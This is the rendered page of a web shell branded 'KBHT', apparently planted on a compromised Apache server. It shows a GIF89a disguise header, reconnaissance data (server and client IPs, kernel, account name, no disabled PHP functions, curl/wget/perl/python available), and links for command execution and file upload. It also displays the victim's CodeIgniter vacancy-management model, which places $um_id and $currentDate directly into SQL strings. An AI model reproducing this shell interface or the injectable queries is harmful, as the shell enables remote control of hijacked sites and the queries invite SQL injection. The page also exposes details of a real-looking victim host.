GIF89a; CRX
KBHT HEHE
Server IP : 172.26.0.195  /  Your IP : 3.145.176.228
Web Server : Apache
System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : jnclnmuac ( 1026)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jnclnmuac/public_html/web/../admission/../jobs/application/models/user/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jnclnmuac/public_html/web/../admission/../jobs/application/models/user/VacancyManagement.php
<?php

/**
 * Description of VacancyManagement
 *
 * @author Softpro India Pvt. Ltd
 */
class VacancyManagement extends CI_Model {

    function getVacancies($currentDate,$um_id) {
        $this->db->select("*,c.cm_id as cate_id,(select CASE WHEN vm_id > 0 THEN 'T' ELSE 'F' END FROM application_mst am where am.vm_id = v.vm_id AND um_id =$um_id AND am_declaration = 'T') AS last_applied");
        $this->db->from("vacancy_mst v");
        $this->db->join("designation_mst ds", "ds.desig_id=v.desig_id");
        $this->db->join("category_mst c", "c.cm_id=ds.cm_id");
        $this->db->join("session_mst sess", "sess.session_id=v.session_id");
        $this->db->join("department_mst d", "d.dm_id=v.dm_id");
        $this->db->where("v.start_date <= '$currentDate' AND v.end_date >= '$currentDate'");
        $this->db->where("v.vm_active_status", "T");
        $this->db->where("v.vm_delete_status", "F");
        $this->db->where("sess.session_status", "C");
        return $this->db->get();
    }

    function getDistictDepartmentOfAppliedVacancy($currentDate) {
        $this->db->distinct();
        $this->db->select("c.cm_name,d.dm_name,ds.cm_id,v.dm_id");
        $this->db->from("vacancy_mst v");
        $this->db->join("designation_mst ds", "ds.desig_id=v.desig_id");
        $this->db->join("category_mst c", "c.cm_id=ds.cm_id");
        $this->db->join("session_mst sess", "sess.session_id=v.session_id");
        $this->db->join("department_mst d", "d.dm_id=v.dm_id");
        $this->db->where("v.start_date <= '$currentDate' AND v.end_date >= '$currentDate'");
        $this->db->where("v.vm_active_status", "T");
        $this->db->where("v.vm_delete_status", "F");
        $this->db->where("sess.session_status", "C");
        return $this->db->get();
    }

    function getTotalOpenings($currentDate) {
        $this->db->select("*");
        $this->db->from("vacancy_mst");
        $this->db->where("start_date <= '$currentDate' AND end_date >='$currentDate'");
        return $this->db->get();
    }

}

KBHT - 2023